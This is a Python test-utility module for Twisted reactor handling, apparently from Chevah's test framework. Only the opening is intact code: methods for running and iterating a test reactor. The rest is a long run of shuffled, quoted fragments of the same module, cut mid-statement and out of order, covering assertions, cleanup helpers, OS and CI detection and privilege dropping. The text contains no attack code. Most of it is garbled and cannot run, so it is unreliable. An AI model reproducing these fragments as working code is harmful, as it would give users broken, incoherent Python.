                # Timeout might no longer be there.
                pass
            if not delayed_calls:
                break

        self._shutdownTestReactor(prevent_stop=True)
        if self._reactor_timeout_failure is not None:
            self._reactor_timeout_failure = None
            # We stop the reactor on failures.
            self._shutdownTestReactor()
            raise AssertionError(
                'executeDelayedCalls took more than %s' % (timeout,))

    def executeReactorUntil(
            self, callable, timeout=None, debug=False, prevent_stop=True):
        """
        Run the reactor until callable returns `True`.
        """
        if timeout is None:
            timeout = self.DEFERRED_TIMEOUT

        self._initiateTestReactor(timeout=timeout)

        while not self._timeout_reached:
            self._iterateTestReactor(debug=debug)
            if callable(reactor):
                break

        self._shutdownTestReactor(prevent_stop=prevent_stop)

    def iterateReactor(self, count=1, timeout=None, debug=False):
        """
        Iterate the reactor without stopping it.
        """
        iterations = [False] * (count - 1)
        iterations.append(True)
        self.executeReactorUntil(
            lambda _: iterations.pop(0), timeout=timeout, debug=debug)

    def iterateReactorWithStop(self, count=1, timeout=None, debug=False):
        """
        Iterate the reactor and stop it at the end.
        """
        iterations = [False] * (count - 1)
        iterations.append(True)
        self.executeReactorUntil(
            lambda _: iterations.pop(0),
            timeout=timeout,
            debug=debug,
            prevent_stop=False,
            )

    def iterateReactorForSeconds(self, duration=1, debug=False):
        """
        Iterate the reactor for `duration` seconds.
        """
        start = time.time()
        self.executeReactorUntil(
            lambda _: time.time() - start > duration,
            timeout=duration + 0.1,
            debug=debug,
            prevent_stop=False,
            )

    def _getDelayedCallName(self, delayed_call):
        """
        Return a string representation of the delayed call.
        """
        raw_name = text_type(delayed_call.func)
        raw_name = raw_name.replace('<function ', '')
        raw_name = raw_name.replace('<bound method ', '')
        return raw_name.split(' ', 1)[0]
\"\"\" # FIXME:922: # Move all", "already a failure, the self.fail below will # report it,", "self._initiateTestReactor(timeout=timeout) # Set it to True to enter the first", "unexpected failure result. @return: The failure result of C{deferred}. @rtype:", "this # should save a few DNS queries. hostname =", "reactor know that we want to stop reactor. reactor.stop() #", "nose import SkipTest try: from twisted.internet.defer import Deferred from twisted.internet.posixbase", "the steps required to initiate a reactor for testing. \"\"\"", "local_wmi = WMI('.') query = ( u'SELECT PeakWorkingSetSize ' u'FROM", "Unix timestamp. \"\"\" return time.time() @classmethod def cleanTemporaryFolder(cls): \"\"\" Clean", "at the end of a test reactor run. When prevent_stop=True,", "FIXME:4428: # When not executed in debug mode, some test", "See: https://en.wikipedia.org/wiki/MacOS#Release_history \"\"\" if os.name == 'nt': parts = platform.version().split('.')", "Starts the reactor, waits for deferred execution, raises error in", "executeDelayedCalls(self, timeout=None, debug=False): \"\"\" Run the reactor until no more", "`True` if is OK for thread to exist after test", "not self._timeout_reached: self._iterateTestReactor(debug=debug) delayed_calls = reactor.getDelayedCalls() try: delayed_calls.remove(self._reactor_timeout_call) except ValueError:", "(RuntimeError, KeyError): # FIXME:863: # When running threads tests the", "it is already started. # This can happen if we", "L{Deferred<twisted.internet.defer.Deferred>} which has a success result. This means L{Deferred.callback<twisted.internet.defer.Deferred.callback>} or", "self.__cleanup__ = [] self._cleanup_stack = [] self._teardown_errors = [] self.test_segments", "len(reactor.getWriters()) > 0: # noqa:cover raise_failure('writers', text_type(reactor.getWriters())) for reader in", "= [] self._cleanup_stack = [] self._teardown_errors = [] self.test_segments =", "purpose and should not be used by normal tests. \"\"\"", "other source. pass reactor.threadCallQueue = [] for delayed_call in reactor.getDelayedCalls():", "result of C{deferred}. @rtype: L{failure.Failure} \"\"\" # FIXME:1370: # Remove", "# We are now in Unix zone. os_name = os.uname()[0].lower()", "def assertSequenceEqual(self, first, second, msg, seq_type): super(ChevahTestCase, self).assertSequenceEqual( first, second,", "= checker.requestAvatarId(credentials) result = self.getDeferredResult(deferred) self.assertEqual('something', result) \"\"\" self._runDeferred( deferred,", "description for the test. bla.bla.tests. is removed. The format is", "credentials = mk.credentials() deferred = checker.requestAvatarId(credentials) failure = self.getDeferredFailure(deferred) self.assertFailureType(AuthenticationError,", "return '%s-%s' % (distro_name, distro_version) def _get_cpu_type(): \"\"\" Return the", "delayed_call in reactor.getDelayedCalls(): try: delayed_call.cancel() except (ValueError, AttributeError): # AlreadyCancelled", "tests you would like to use `getDeferredFailure` or `getDeferredResult`. Run", "import text_type from six.moves import range import contextlib import inspect", "failureResultOf(self, deferred, *expectedExceptionTypes): \"\"\" Return the current failure result of", "of names for delayed calls which should not be considered", "deferred.addBoth(result.append) if not result: self.fail( \"Failure result expected on %r,", "the stop code. 
reactor.iterate() # Set flag to fake a", "timeout, self._raiseReactorTimeoutError, timeout) # Don't start the reactor if it", "an unexpected failure result. @return: The failure result of C{deferred}.", "all RHEL variants. distro_name = 'rhel' distro_version = ld.version().split('.', 1)[0]", "reactor. from twisted.internet import reactor except ImportError: reactor = None", "# current stack and we don't care about it. for", "if success is None: raise AssertionError('Failed to find \"success\" attribute.')", "for Chevah Nose runner. This is only called when we", "str while second is unicode for \"%s\".' % ( first,)", "delayed calls, readers or writers. This should only be called", "tempPath(self, prefix='', suffix=''): \"\"\" Return (path, segments) for a path", "Python below 2.7 we use the separate unittest2 module. #", "Windows NT family. See: https://en.wikipedia.org/wiki/Windows_NT#Releases On OSX it returns `osx`", "reactor. \"\"\" reactor.runUntilCurrent() if debug: # noqa:cover # When debug", "not reactor: return try: reactor.removeAll() except (RuntimeError, KeyError): # FIXME:863:", "for member in (temp_filesystem.getFolderContent(folder_segments)): if only_marked and member.find(TEST_NAME_MARKER) == -1:", "the default temp folder and mark it for cleanup. \"\"\"", "teardown. CREATE_TEST_USER = None @classmethod def setUpTestUser(cls): \"\"\" Add `CREATE_TEST_USER`", "prevent_stop=prevent_stop, ) self.assertIsNotFailure(deferred) return deferred.result def assertWasCalled(self, deferred): \"\"\" Check", "callable returns `True`. \"\"\" if timeout is None: timeout =", "case some other modules are changing the reactor. from twisted.internet", "reactor.stop() # Let the reactor run one more time to", "failure result. @return: The result of C{deferred}. \"\"\" # FIXME:1370:", "Normalize all RHEL variants. distro_name = 'rhel' distro_version = ld.version().split('.',", "Please use self.patch and self.patchObject. Patch = patch _environ_user =", "now(self): \"\"\" Return current Unix timestamp. \"\"\" return time.time() @classmethod", "other delayed calls. have_callbacks = True break # No need", "'LOGNAME' in os.environ and 'USER' not in os.environ: os.environ['USER'] =", "using a real OS account. \"\"\" @classmethod def setUpClass(cls): #", "process_capabilities.os_name # We delay the import as it will call", "have_callbacks = False # Check for active jobs in thread", "patching objects. \"\"\" return patch.object(*args, **kwargs) def now(self): \"\"\" Return", "setUpClass(cls): # FIXME:924: # Disabled when we can not find", "GITHUB='github-actions', TRAVIS='travis', BUILDBOT='buildbot', UNKNOWN='unknown-ci', AZURE='azure-pipelines', ) def _get_ci_name(): \"\"\" Return", "assertIsInstance(self, expected_type, value, msg=None): \"\"\" Raise an exception if `value`", "continue self._shutdownTestReactor() def executeDelayedCalls(self, timeout=None, debug=False): \"\"\" Run the reactor", "and start/stop the reactor during tests. \"\"\" # Number of", "system_users.dropPrivileges(username=cls._drop_user) @staticmethod def skipTest(message=''): '''Return a SkipTest exception.''' return SkipTest(message)", "is_exception = False for excepted_callback in self.EXCEPTED_DELAYED_CALLS: if excepted_callback in", "def iterateReactor(self, count=1, timeout=None, debug=False): \"\"\" Iterate the reactor without", "'utf-8', errors='replace'))) else: return result[0] def failureResultOf(self, deferred, *expectedExceptionTypes): \"\"\"", "reactor at shutdown, only if test # passed. 
self.assertIsNone(self._reactor_timeout_failure) self._assertReactorIsClean()", "'x86_64': return 'x64' return base _CI_NAMES = Bunch( LOCAL='local', GITHUB='github-actions',", "deferred execution, raises error in timeout, stops the reactor. This", "if it is already started. # This can happen if", "debug=False): \"\"\" Run the reactor until no more delayed calls", "dropPrivileges(cls): '''Drop privileges to normal users.''' if cls._drop_user == '-':", "(parts[1],) if os_name == 'aix': # noqa:cover return 'aix-%s.%s' %", "None: self._reactor_timeout_failure = None # We stop the reactor on", "return (path, segments) def tempFolder(self, name=None, prefix='', suffix=''): \"\"\" Create", "( deferred, result[0].getBriefTraceback().decode( 'utf-8', errors='replace'))) else: return result[0] def failureResultOf(self,", "if not msg: msg = u'First is str while second", "Test suite should be started as root and we drop", "suffix=suffix) def tempPathCleanup(self, prefix='', suffix=''): \"\"\" Return (path, segments) for", "debug=False): \"\"\" Iterate the reactor and stop it at the", "if isinstance(reader, reader_type): excepted = True break if not excepted:", "os_administration.addUser(user) return user def setUp(self): super(FileSystemTestCase, self).setUp() # Initialized only", "second_keys = sorted(second.keys()) first_values = [first[key] for key in first_keys]", "in name: return True return False def addCleanup(self, function, *args,", "the reactor for `duration` seconds.. \"\"\" start = time.time() self.executeReactorUntil(", "\"\"\" self._cleanup_stack.append(self.__cleanup__) self.__cleanup__ = [] def exitCleanup(self): \"\"\" To be", "0: have_callbacks = True continue if reactor.threadpool and len(reactor.threadpool.working) >", "**kwargs): \"\"\" Wrapper around the stdlib call to allow non-context", "We skip our own timeout call. if delayed is self._reactor_timeout_call:", "= inspect.stack()[i][0].f_locals['success'] break except KeyError: success = None if success", "transport.protocol = protocol protocol.lineReceived('FEAT') self.executeReactor() result = transport.value() self.assertStartsWith('211-Features:\\n', result)", "if not reactor: return try: reactor.removeAll() except (RuntimeError, KeyError): #", "@classmethod def initialize(cls, drop_user): \"\"\" Initialize the testing environment. \"\"\"", "self._timeout_reached: self._iterateTestReactor(debug=debug) delayed_calls = reactor.getDelayedCalls() try: delayed_calls.remove(self._reactor_timeout_call) except ValueError: #", "reactor.threadpool.threads def _threadPoolWorking(self): \"\"\" Return working thread from pool, or", "stop code. reactor.iterate() # Set flag to fake a clean", "end of a test reactor run. When prevent_stop=True, the reactor", "to exist after test is done. \"\"\" for exception in", "raise AssertionError('OS not supported.') def folderInTemp(self, *args, **kwargs): \"\"\" Create", "-*- coding: utf-8 -*- # Copyright (c) 2011 <NAME>. #", "removed. The format is customized for Chevah Nose runner. This", "reactor. \"\"\" self._timeout_reached = True failure = AssertionError( 'Reactor took", "Run reactor until no more delayed calls, readers or writers", "Python 2.7 isInstance is already defined, but with swapped #", "returns `osx` followed by the version. 
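
# A minimal usage sketch, not part of the recovered module: it exercises
# the deferred helpers above with already-fired deferreds.  The class name
# is hypothetical and the block is guarded because Twisted is optional in
# this module.
if reactor is not None:
    from twisted.internet.defer import fail, succeed

    class _DeferredHelpersExample(TwistedTestCase):
        """
        Executable illustration for getDeferredResult/getDeferredFailure.
        """

        def test_success_result(self):
            deferred = succeed('something')
            self.assertEqual('something', self.getDeferredResult(deferred))

        def test_failure_result(self):
            deferred = fail(RuntimeError('marker'))
            failure = self.getDeferredFailure(deferred)
            # Failure.check() returns the matching class, or None.
            self.assertTrue(failure.check(RuntimeError))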

class ChevahTestCase(TwistedTestCase, AssertionMixin):
    """
    Test case for Chevah tests.

    Checks that the temporary folder is clean at exit.
    """

    os_name = process_capabilities.os_name
    os_family = process_capabilities.os_family
    os_version = _get_os_version()
    cpu_type = process_capabilities.cpu_type
    ci_name = _get_ci_name()
    CI = _CI_NAMES

    # List of partial thread names to ignore during the tearDown.
    # No need for the full thread name.
    excepted_threads = [
        'MainThread',
        'threaded_reactor',
        'GlobalPool-WorkerHandler',
        'GlobalPool-TaskHandler',
        'GlobalPool-ResultHandler',
        'PoolThread-twisted.internet.reactor',
        ]

    # We assume that hostname does not change during test and this
    # should save a few DNS queries.
    hostname = _get_hostname()

    Bunch = Bunch
    Mock = Mock
    #: Obsolete. Please use self.patch and self.patchObject.
    Patch = patch

    _environ_user = None
    _drop_user = '-'

    def setUp(self):
        super(ChevahTestCase, self).setUp()
        self.__cleanup__ = []
        self._cleanup_stack = []
        self._teardown_errors = []
        self.test_segments = None

    def tearDown(self):
        self.callCleanup()
        self._checkTemporaryFiles()
        threads = threading.enumerate()
        if len(threads) > 1:
            for thread in threads:
                thread_name = thread.getName()
                if self._isExceptedThread(thread_name):
                    continue
                self._teardown_errors.append(AssertionError(
                    'There are still active threads, '
                    'beside the main thread: %s - %s' % (
                        thread_name, threads)))

        super(ChevahTestCase, self).tearDown()

        errors, self._teardown_errors = self._teardown_errors, None
        if errors:
            raise AssertionError('Cleanup errors: %r' % (errors,))

    def _isExceptedThread(self, name):
        """
        Return `True` if it is OK for the thread to exist after the test
        is done.
        """
        for exception in self.excepted_threads:
            if name in exception:
                return True
            if exception in name:
                return True
        return False

    def addCleanup(self, function, *args, **kwargs):
        """
        Overwrite unit-test behaviour to run cleanup methods before
        tearDown.
        """
        self.__cleanup__.append((function, args, kwargs))

    def callCleanup(self):
        """
        Call all cleanup methods.

        If a cleanup fails, the next cleanups will continue to be called
        and the first failure is raised.
        """
        for function, args, kwargs in reversed(self.__cleanup__):
            try:
                function(*args, **kwargs)
            except Exception as error:  # noqa:cover
                self._teardown_errors.append(error)
        self.__cleanup__ = []

    def enterCleanup(self):
        """
        Called when starting to use stacked cleanups.
        """
        self._cleanup_stack.append(self.__cleanup__)
        self.__cleanup__ = []

    def exitCleanup(self):
        """
        To be called at the end of a stacked cleanup.
        """
        self.callCleanup()
        self.__cleanup__ = self._cleanup_stack.pop()

    @contextlib.contextmanager
    def stackedCleanup(self):
        """
        Context manager for stacked cleanups.
        """
        try:
            self.enterCleanup()
            yield
        finally:
            self.exitCleanup()

    def _checkTemporaryFiles(self):
        """
        Check that no temporary files or folders are present.
        """
        # FIXME:922:
        # Move all filesystem checks into a specialized class.
        if self.test_segments:
            if mk.fs.isFolder(self.test_segments):
                mk.fs.deleteFolder(self.test_segments, recursive=True)
            else:
                mk.fs.deleteFile(self.test_segments)

        checks = [
            self.assertTempIsClean,
            self.assertWorkingFolderIsClean,
            ]
        errors = []
        for check in checks:
            try:
                check()
            except AssertionError as error:
                errors.append(error.message)

        if errors:  # noqa:cover
            self._teardown_errors.append(AssertionError(
                'There are temporary files or folders left over.\n %s' % (
                    '\n'.join(errors))))

    def shortDescription(self):  # noqa:cover
        """
        The short description for the test.

        bla.bla.tests. is removed.
        The format is customized for the Chevah Nose runner.
        This is only called when we run with -v or when we show the error.
        """
        class_name = text_type(self.__class__)[8:-2]
        class_name = class_name.replace('.Test', ':Test')
        tests_start = class_name.find('.tests.') + 7
        class_name = class_name[tests_start:]
        return '%s - %s' % (class_name, self._testMethodName)

    @staticmethod
    def getHostname():
        """
        Return the hostname of the current system.
        """
        return _get_hostname()

    @classmethod
    def initialize(cls, drop_user):
        """
        Initialize the testing environment.
        """
        cls._drop_user = drop_user
        os.environ['DROP_USER'] = drop_user

        if 'LOGNAME' in os.environ and 'USER' not in os.environ:
            os.environ['USER'] = os.environ['LOGNAME']

        if 'USER' in os.environ and 'USERNAME' not in os.environ:
            os.environ['USERNAME'] = os.environ['USER']

        if 'USERNAME' in os.environ and 'USER' not in os.environ:
            os.environ['USER'] = os.environ['USERNAME']

        cls._environ_user = os.environ['USER']

        cls.cleanTemporaryFolder()

    @classmethod
    def dropPrivileges(cls):
        '''Drop privileges to normal users.'''
        if cls._drop_user == '-':
            return

        os.environ['USERNAME'] = cls._drop_user
        os.environ['USER'] = cls._drop_user
        # Test suite should be started as root and we drop effective user
        # privileges.
        system_users.dropPrivileges(username=cls._drop_user)

    @staticmethod
    def skipTest(message=''):
        '''Return a SkipTest exception.'''
        return SkipTest(message)

    @property
    def _caller_success_member(self):
        '''Retrieve the 'success' member from the test case.'''
        success_state = None
        # We search starting with the second frame, since the first frame
        # is the current one and we don't care about it.
        for level in inspect.stack()[1:]:
            try:
                success_state = level[0].f_locals['success']
                break
            except KeyError:
                success_state = None
        if success_state is None:
            raise AssertionError('Failed to find "success" attribute.')
        return success_state

    @staticmethod
    def patch(*args, **kwargs):
        """
        Helper for generic patching.
        """
        return patch(*args, **kwargs)

    @staticmethod
    def patchObject(*args, **kwargs):
        """
        Helper for patching objects.
        """
        return patch.object(*args, **kwargs)

    def now(self):
        """
        Return current Unix timestamp.
        """
        return time.time()

    @classmethod
    def cleanTemporaryFolder(cls):
        """
        Clean all test files from the temporary folder.

        Return a list of members which were removed.
        """
        return cls._cleanFolder(mk.fs.temp_segments)

    @classmethod
    def _cleanFolder(cls, folder_segments, only_marked=False):
        """
        Clean all test files from folder_segments.

        Return a list of members which were removed.
        """
        # In case we are running the test suite as super user,
        # we use the super filesystem for cleaning.
        if cls._environ_user == cls._drop_user:
            temp_avatar = SuperAvatar()
        else:
            temp_avatar = DefaultAvatar()

        temp_filesystem = LocalFilesystem(avatar=temp_avatar)
        temp_members = []
        for member in (temp_filesystem.getFolderContent(folder_segments)):
            if only_marked and member.find(TEST_NAME_MARKER) == -1:
                continue
            temp_members.append(member)
            segments = folder_segments[:]
            segments.append(member)
            if temp_filesystem.isFolder(segments):
                temp_filesystem.deleteFolder(segments, recursive=True)
            else:
                temp_filesystem.deleteFile(segments)

        return temp_members
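    # A minimal usage sketch, not part of the recovered module: stacked
    # cleanups let a test flush a group of cleanups early, instead of
    # waiting for tearDown:
    #
    #     with self.stackedCleanup():
    #         path, segments = self.tempFolder()
    #         ...  # work with the folder
    #     # exitCleanup() has already deleted the folder here.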
    def _baseAssertEqual(self, first, second, msg=None):
        """
        Update to stdlib to make sure we don't compare str with unicode.
        """
        if (
            isinstance(first, text_type) and
                not isinstance(second, text_type)
                ):  # noqa:cover
            if not msg:
                msg = (
                    u'First is unicode while second is str for "%s".' % (
                        first,))
            raise AssertionError(msg.encode('utf-8'))

        if (
            not isinstance(first, text_type) and
                isinstance(second, text_type)
                ):  # noqa:cover
            if not msg:
                msg = (
                    u'First is str while second is unicode for "%s".' % (
                        first,))
            raise AssertionError(msg.encode('utf-8'))

        return super(ChevahTestCase, self)._baseAssertEqual(
            first, second, msg=msg)

    def assertRaises(self, exception_class, callback=None, *args, **kwargs):
        """
        Wrapper around the stdlib call to allow non-context usage.
        """
        super_assertRaises = super(ChevahTestCase, self).assertRaises
        if callback is None:
            return super_assertRaises(exception_class)

        with super_assertRaises(exception_class) as context:
            callback(*args, **kwargs)

        return context.exception

    def assertSequenceEqual(self, first, second, msg, seq_type):
        super(ChevahTestCase, self).assertSequenceEqual(
            first, second, msg, seq_type)

        for first_element, second_element in zip(first, second):
            self.assertEqual(first_element, second_element)

    def assertDictEqual(self, first, second, msg):
        super(ChevahTestCase, self).assertDictEqual(first, second, msg)

        first_keys = sorted(first.keys())
        second_keys = sorted(second.keys())
        first_values = [first[key] for key in first_keys]
        second_values = [second[key] for key in second_keys]
        self.assertSequenceEqual(first_keys, second_keys, msg, list)
        self.assertSequenceEqual(first_values, second_values, msg, list)

    def assertSetEqual(self, first, second, msg):
        super(ChevahTestCase, self).assertSetEqual(first, second, msg)

        first_elements = sorted(first)
        second_elements = sorted(second)
        self.assertSequenceEqual(
            first_elements, second_elements, msg, list)

    @classmethod
    def getPeakMemoryUsage(cls):
        """
        Return maximum memory usage in kilobytes.
        """
        if cls.os_family == 'posix':
            import resource
            return resource.getrusage(resource.RUSAGE_SELF).ru_maxrss
        elif cls.os_family == 'nt':
            from wmi import WMI
            local_wmi = WMI('.')

            query = (
                u'SELECT PeakWorkingSetSize '
                u'FROM Win32_Process '
                u'WHERE Handle=%d' % os.getpid())
            result = local_wmi.query(query.encode('utf-8'))
            peak_working_set_size = int(result[0].PeakWorkingSetSize)
            # FIXME:2099:
            # Windows XP reports the value in bytes, instead of kilobytes.
            return int(peak_working_set_size)
        else:
            raise AssertionError('OS not supported.')

    def folderInTemp(self, *args, **kwargs):
        """
        Create a folder in the default temp folder and mark it for
        cleanup.
        """
        kwargs['cleanup'] = self.addCleanup
        return mk.fs.folderInTemp(*args, **kwargs)

    def fileInTemp(self, *args, **kwargs):
        """
        Create a file in the default temp folder and mark it for cleanup.
        """
        kwargs['cleanup'] = self.addCleanup
        return mk.fs.fileInTemp(*args, **kwargs)

    def assertIn(self, target, source):
        """
        Overwrite stdlib to swap the arguments.
        """
        if source not in target:
            message = u'%s not in %s.' % (repr(source), repr(target))
            raise AssertionError(message.encode('utf-8'))

    def assertIsInstance(self, expected_type, value, msg=None):
        """
        Raise an exception if `value` is not an instance of
        `expected_type`.
        """
        # In Python 2.7 assertIsInstance is already defined, but with
        # swapped arguments.
        if not inspect.isclass(expected_type):
            expected_type, value = value, expected_type

        if not isinstance(value, expected_type):
            raise AssertionError(
                "Expecting type %s, but got %s. %s" % (
                    expected_type, type(value), msg))

    def tempPath(self, prefix='', suffix=''):
        """
        Return (path, segments) for a path which is not created yet.
        """
        return mk.fs.makePathInTemp(prefix=prefix, suffix=suffix)

    def tempPathCleanup(self, prefix='', suffix=''):
        """
        Return (path, segments) for a path which is not created yet but
        which will be automatically removed.
        """
        return mk.fs.pathInTemp(
            cleanup=self.addCleanup, prefix=prefix, suffix=suffix)

    def tempFile(self, content='', prefix='', suffix='', cleanup=True):
        """
        Return (path, segments) for a new file created in temp which is
        auto cleaned.
        """
        segments = mk.fs.createFileInTemp(prefix=prefix, suffix=suffix)
        path = mk.fs.getRealPathFromSegments(segments)

        if cleanup:
            self.addCleanup(mk.fs.deleteFile, segments)

        return (path, segments)

    def tempFolder(self, name=None, prefix='', suffix=''):
        """
        Create a new temp folder and return its path and segments, which
        is auto cleaned.
        """
        segments = mk.fs.createFolderInTemp(
            foldername=name, prefix=prefix, suffix=suffix)
        path = mk.fs.getRealPathFromSegments(segments)
        self.addCleanup(mk.fs.deleteFolder, segments, recursive=True)
        return (path, segments)
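
# A minimal usage sketch, not part of the recovered module: the temporary
# path helpers from ChevahTestCase in action.  The class name is
# hypothetical.
class _TempHelpersExample(ChevahTestCase):

    def test_temp_folder_is_auto_cleaned(self):
        path, segments = self.tempFolder()
        # The folder exists while the test runs; the cleanup registered
        # via addCleanup() deletes it before tearDown's checks.
        self.assertTrue(mk.fs.isFolder(segments))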
We only support the Windows NT family. See: https://en.wikipedia.org/wiki/Windows_NT#Releases", "_CI_NAMES.GITHUB if os.environ.get('TRAVIS', '').lower() == 'true': return _CI_NAMES.TRAVIS if os.environ.get('INFRASTRUCTURE',", "None _SIGCHLDWaker = None from chevah.compat import ( DefaultAvatar, LocalFilesystem,", "the reactor. # To not slow down all the tests,", "the reactor. from twisted.internet import reactor except ImportError: reactor =", "to have a much better debug output. # Otherwise the", "AssertionError( 'Deferred contains a failure: %s' % (error)) def _get_os_version():", "= mk.fs.createFileInTemp(prefix=prefix, suffix=suffix) path = mk.fs.getRealPathFromSegments(segments) if cleanup: self.addCleanup(mk.fs.deleteFile, segments)", "Mock = Mock #: Obsolete. Please use self.patch and self.patchObject.", "done. \"\"\" for exception in self.excepted_threads: if name in exception:", "if len(reactor.getWriters()) > 0: # noqa:cover raise_failure('writers', text_type(reactor.getWriters())) for reader", "\"\"\" Called at the end of a test reactor run.", "base == 'aarch64': return 'arm64' if base == 'x86_64': return", "\"\"\" for exception in self.excepted_threads: if name in exception: return", "from __future__ import absolute_import from six import text_type from six.moves", "exception in self.excepted_threads: if name in exception: return True if", "u'First is str while second is unicode for \"%s\".' %", "while isinstance(result, Deferred): self._executeDeferred(result, timeout=timeout, debug=debug) result = deferred.result def", "effective user # privileges. system_users.dropPrivileges(username=cls._drop_user) @staticmethod def skipTest(message=''): '''Return a", "already defined, but with swapped # arguments. if not inspect.isclass(expected_type):", "if 'USER' in os.environ and 'USERNAME' not in os.environ: os.environ['USERNAME']", "__future__ import absolute_import from six import text_type from six.moves import", "exception: return True if exception in name: return True return", "exception.''' return SkipTest(message) @property def _caller_success_member(self): '''Retrieve the 'success' member", "second is str for \"%s\".' % ( first,) raise AssertionError(msg.encode('utf-8'))", "test case for all file-system tests using a real OS", "Called when start using stacked cleanups. \"\"\" self._cleanup_stack.append(self.__cleanup__) self.__cleanup__ =", "deferred): \"\"\" Raise assertion error if deferred is a Failure.", "delayed calls. have_callbacks = True break # No need to", "we don't compare str with unicode. \"\"\" if ( isinstance(first,", "None for i in range(2, 6): try: success = inspect.stack()[i][0].f_locals['success']", "% (timeout,)) def executeReactorUntil( self, callable, timeout=None, debug=False, prevent_stop=True): \"\"\"", "if not excepted: # noqa:cover raise_failure('readers', text_type(reactor.getReaders())) for delayed_call in", "to be executed and will not stop the reactor. \"\"\"", "instead\" % ( deferred, result[0])) def getDeferredResult( self, deferred, timeout=None,", "testing. \"\"\" from chevah.compat.testing import TEST_ACCOUNT_GROUP user = mk.makeTestUser(home_group=TEST_ACCOUNT_GROUP) os_administration.addUser(user)", "method before tearDown. \"\"\" self.__cleanup__.append((function, args, kwargs)) def callCleanup(self): \"\"\"", "[] self.test_segments = None def tearDown(self): self.callCleanup() self._checkTemporaryFiles() threads =", "removed only at the end of test. Only use this", "than %.2f seconds to execute.' 
% timeout) self._reactor_timeout_failure = failure", "first_keys = sorted(first.keys()) second_keys = sorted(second.keys()) first_values = [first[key] for", "stdlib to swap the arguments. \"\"\" if source not in", "a failure result. @return: The result of C{deferred}. \"\"\" #", "except KeyError: success = None if success is None: raise", "reactor. EXCEPTED_DELAYED_CALLS = [] EXCEPTED_READERS = [ _UnixWaker, _SocketWaker, _SIGCHLDWaker,", "if self._caller_success_member: # Check for a clean reactor at shutdown,", "a result. @type deferred: L{Deferred<twisted.internet.defer.Deferred>} @raise SynchronousTestCase.failureException: If the L{Deferred<twisted.internet.defer.Deferred>}", "current failure on the deferred. It transforms an failure into", "msg, seq_type) for first_element, second_element in zip(first, second): self.assertEqual(first_element, second_element)", ") def iterateReactorForSeconds(self, duration=1, debug=False): \"\"\" Iterate the reactor for", "queue still contains delayed deferred.\\n' '%s' % (self._reactorQueueToString())) break #", "for other things as we already know that we need", "it has reached the end of its callback chain and", "no longer be there. pass if not delayed_calls: break self._shutdownTestReactor(prevent_stop=True)", "\"\"\" return patch.object(*args, **kwargs) def now(self): \"\"\" Return current Unix", "%s. %s\" % ( expected_type, type(value), msg)) def tempPath(self, prefix='',", "the actual deferred execution. \"\"\" if not deferred.called: deferred_done =", "result. \"\"\" # FIXME:1370: # Remove / re-route this code", "for Chevah tests. Checks that temporary folder is clean at", "specific code. Provides support for running deferred and start/stop the", "/ re-route this code after upgrading to Twisted 13 result", "Arch has no version. return 'arch' if distro_name in ['centos',", "\"\"\" start = time.time() self.executeReactorUntil( lambda _: time.time() - start", "and self.patchObject. Patch = patch _environ_user = None _drop_user =", "a new file created in temp which is auto cleaned.", "'There are still active threads, ' 'beside the main thread:", "# Remove / re-route this code after upgrading to Twisted", "a new temp folder and return its path and segments,", "List of names for delayed calls which should not be", "about it. for level in inspect.stack()[1:]: try: success_state = level[0].f_locals['success']", "job. \"\"\" if not reactor.threadpool: return [] else: return reactor.threadpool.working", "expect - if provided, and the the exception wrapped by", "AssertionError('Deferred is not a failure.') def assertIsNotFailure(self, deferred): \"\"\" Raise", "and should not be used by normal tests. \"\"\" if", "\"\"\" if not deferred.called: raise AssertionError('This deferred was not called", "def setUp(self): super(ChevahTestCase, self).setUp() self.__cleanup__ = [] self._cleanup_stack = []", "- %s' % ( thread_name, threads))) super(ChevahTestCase, self).tearDown() errors, self._teardown_errors", "you linter. TestCase else: from unittest import TestCase try: #", "= mk.credentialsChecker() credentials = mk.credentials() deferred = checker.requestAvatarId(credentials) failure =", "will fail. @raise SynchronousTestCase.failureException: If the L{Deferred<twisted.internet.defer.Deferred>} has no result,", "that temporary folder is clean at exit. \"\"\" os_name =", "for reader in reactor.getReaders(): excepted = False for reader_type in", "and from the fixtures/cleanup # code which is executed from", "messages will flood the output. 
print ( u'delayed: %s\\n' u'threads:", "prevent_stop=False): \"\"\" Called at the end of a test reactor", ") self.assertIsNotFailure(deferred) return deferred.result def assertWasCalled(self, deferred): \"\"\" Check that", "_get_hostname(): \"\"\" Return hostname as resolved by default DNS resolver.", "result instead:\\n%s\" % ( deferred, result[0].getBriefTraceback().decode( 'utf-8', errors='replace'))) else: return", "is not an instance of `expected_type` \"\"\" # In Python", "this is just the os_name. On Linux is the distribution", "a reactor for testing. \"\"\" self._timeout_reached = False # Set", "`True`. \"\"\" if timeout is None: timeout = self.DEFERRED_TIMEOUT self._initiateTestReactor(timeout=timeout)", "platform.release()) if os_name != 'linux': return process_capabilities.os_name # We delay", "lsb_release. import ld distro_name = ld.id() if distro_name == 'arch':", "isinstance(value, expected_type): raise AssertionError( \"Expecting type %s, but got %s.", "_CI_NAMES.BUILDBOT if os.environ.get('GITHUB_ACTIONS', '').lower() == 'true': return _CI_NAMES.GITHUB if os.environ.get('TRAVIS',", "end. \"\"\" iterations = [False] * (count - 1) iterations.append(True)", "# Set it to True to enter the first loop.", "callback chain and the last callback or errback returned a", "- %s.%s\" % ( self._testMethodName, class_name, self._testMethodName) def assertRaises(self, exception_class,", "FIXME:863: # When running threads tests the reactor touched from", "have a result. DEFERRED_TIMEOUT = 1 # List of names", "result = [] for delayed in reactor.getDelayedCalls(): # noqa:cover result.append(text_type(delayed.func))", "when we do multi-threading. pass def _raiseReactorTimeoutError(self, timeout): \"\"\" Signal", "def _shutdownTestReactor(self, prevent_stop=False): \"\"\" Called at the end of a", "cleaned. \"\"\" segments = mk.fs.createFileInTemp(prefix=prefix, suffix=suffix) path = mk.fs.getRealPathFromSegments(segments) if", "# interval of at most 1 second. if t2 is", "mk.fs.getAbsoluteRealPath('.') segments = mk.fs.getSegmentsFromRealPath(path) return cls._cleanFolder(segments, only_marked=True) @classmethod def _cleanFolder(cls,", "be executed and will not stop the reactor. \"\"\" if", "return mk.fs.pathInTemp( cleanup=self.addCleanup, prefix=prefix, suffix=suffix) def tempFile(self, content='', prefix='', suffix='',", "'USERNAME' in os.environ and 'USER' not in os.environ: os.environ['USER'] =", "failure: %s' % (error)) def _get_os_version(): \"\"\" On non-Linux this", "return success_state @staticmethod def patch(*args, **kwargs): \"\"\" Helper for generic", "if os_name == 'aix': # noqa:cover return 'aix-%s.%s' % (platform.version(),", "is already started. # This can happen if we prevent", "thread.getName() if self._isExceptedThread(thread_name): continue 